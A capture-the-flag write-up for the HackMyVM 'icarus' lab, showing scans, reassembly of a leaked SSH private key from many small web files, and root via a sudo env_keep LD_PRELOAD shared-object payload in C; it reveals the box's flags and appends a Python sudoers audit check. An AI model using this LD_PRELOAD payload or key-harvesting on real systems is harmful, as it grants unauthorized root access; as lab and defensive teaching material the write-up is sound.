[Target Practice Diary] HackMyVm: icarus

Host discovery

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# arp-scan -I eth1 -l
192.168.56.146  08:00:27:d5:6a:34  PCS Systemtechnik GmbH

The host address is 192.168.56.146.

Port scan

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# nmap -p- 192.168.56.146
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Probing port 80

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146
<!doctype html>
<html lang="en">
<title>LOGIN</title>
<form class="form-signin" action="check.php" method="post">
<input type="text" autocomplete="off" id="user" name="user" name="user" placeholder="Username" required autofocus>
<input type="password" name="password" id="password" placeholder="Password" required>
<input type="submit" value="Sign in">
</form>
</body>
</html>

The page is a login form.

Directory enumeration

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# dirsearch -u http://192.168.56.146
[00:51:36] Starting:
[00:51:41] 200 -    9KB - /a
[00:51:51] 200 -   21B - /check.php
[00:52:02] 302 -    0B - /login.php  ->  index.php
[00:52:23] 200 -    1B - /xml

Task Completed

Gathering leaked information

Request each of the discovered paths:

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/a
a
xaa
xab
(....)
xzbta
xzbtb
xzbtc

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/check.php
Man, you make me cry.

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/xml
K

Requesting a few of the names listed in /a at random shows that each one returns a result:

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/xaa
-

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/xab
-

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/xzabc
O

Retrieving id_rsa

# Fetch the list, strip the "a" on the first line, and retrieve id_rsa
┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# curl 192.168.56.146/a > dir.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9641  100  9641    0     0  1752k      0 --:--:-- --:--:-- --:--:-- 1883k

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# cat dir.txt | wc -l
1825

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# tail -1823 dir.txt > dir2.txt

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# for i in $(cat dir2.txt); do curl 192.168.56.146/$i >> id; done

View the id file:

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# cat id
-----BEGIN OPENSSH PRIVATE KEY-----
(....)
-----END OPENSSH PRIVATE KEY-----

Obtaining the username

The comment field of the public key derived from the private key gives the username:

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# chmod 600 id

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# ssh-keygen -y -f id
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnFqDEuI3k5uE+M1yzYjZyRxisSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydivGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzNj3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9PCI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyR icarus@icarus

Logging in as icarus

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]
└─# ssh icarus@192.168.56.146 -i id
icarus@icarus:~$ id
uid=1000(icarus) gid=1000(icarus) groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

We now have the privileges of the icarus user.

user.txt

icarus@icarus:~$ cat user.txt
Dontgotothesun

Privilege escalation

icarus@icarus:~$ sudo -l
Matching Defaults entries for icarus on icarus:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icarus may run the following commands on icarus:
    (ALL : ALL) NOPASSWD: /usr/bin/id

Note the "env_keep+=LD_PRELOAD" entry: sudo preserves the caller's LD_PRELOAD variable when it runs the permitted command as root.

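┌──(root㉿xhh)-[~/Desktop/some/setenv]
└─# cat pe.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the dynamic loader loads this shared object. */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep the child shell from loading the library again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}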

Compile this into pe.so.

icarus@icarus:~$ ls
flag.sh  pe.so  user.txt
icarus@icarus:~$ sudo LD_PRELOAD=./pe.so id
root@icarus:/home/icarus# id
uid=0(root) gid=0(root) groups=0(root)

We now have root privileges.

In addition, the sudo version is "Sudo version 1.8.27"; the sudo on the target is too old and is affected by CVE-2021-3156.
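For defenders, the root cause above is a sudoers policy that lets a dynamic-loader variable survive env_reset. The following audit check is an added example, not part of the original write-up: it replays the env_keep operations found in `sudo -l` output or sudoers text and reports loader variables that remain preserved. The names RISKY_VARS, risky_env_keep, env_reset_disabled and SAMPLE_SUDOERS are assumptions made for this example.

```python
import re

# Loader variables that make a sudo-run binary load caller-chosen code.
# Constructed watch list for this example; extend it for your platform.
RISKY_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Matches env_keep = / += / -= with a bare or double-quoted value list.
ENV_KEEP = re.compile(r'(?<![\w!])env_keep\s*(\+=|-=|=)\s*(?:"([^"]*)"|([^,\s"]+))')

def risky_env_keep(text):
    """Return risky variables still in env_keep after applying every
    Defaults entry in order (sudoers lines or `sudo -l` output)."""
    kept = set()
    for line in text.splitlines():
        if line.lstrip().startswith("#"):      # sudoers comment (or #include)
            continue
        for op, quoted, bare in ENV_KEEP.findall(line):
            names = set((quoted or bare).split())
            if op == "=":
                kept = names                   # list replaced
            elif op == "+=":
                kept |= names                  # variables appended
            else:
                kept -= names                  # variables removed
    return sorted(kept & RISKY_VARS)

def env_reset_disabled(text):
    """True if any non-comment line carries `!env_reset`."""
    return any(re.search(r'(?<!\w)!env_reset\b', l)
               for l in text.splitlines() if not l.lstrip().startswith("#"))

# `sudo -l` output as shown on this page.
PAGE_SUDO_L = r"""Matching Defaults entries for icarus on icarus:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icarus may run the following commands on icarus:
    (ALL : ALL) NOPASSWD: /usr/bin/id
"""

# Constructed sudoers fragment: two risky variables added, one removed again.
SAMPLE_SUDOERS = '''Defaults env_reset
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
Defaults env_keep -= LD_PRELOAD
# Defaults env_keep += LD_AUDIT
'''

if __name__ == "__main__":
    for name, text in (("page sudo -l", PAGE_SUDO_L), ("sample sudoers", SAMPLE_SUDOERS)):
        print(name, risky_env_keep(text), "env_reset disabled:", env_reset_disabled(text))
```

Any variable the check reports should be dropped from env_keep in sudoers; the check only sees entries present in the text it is given, not sudo's built-in defaults.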

root.txt

root@icarus:~# cat root.txt
RIPicarus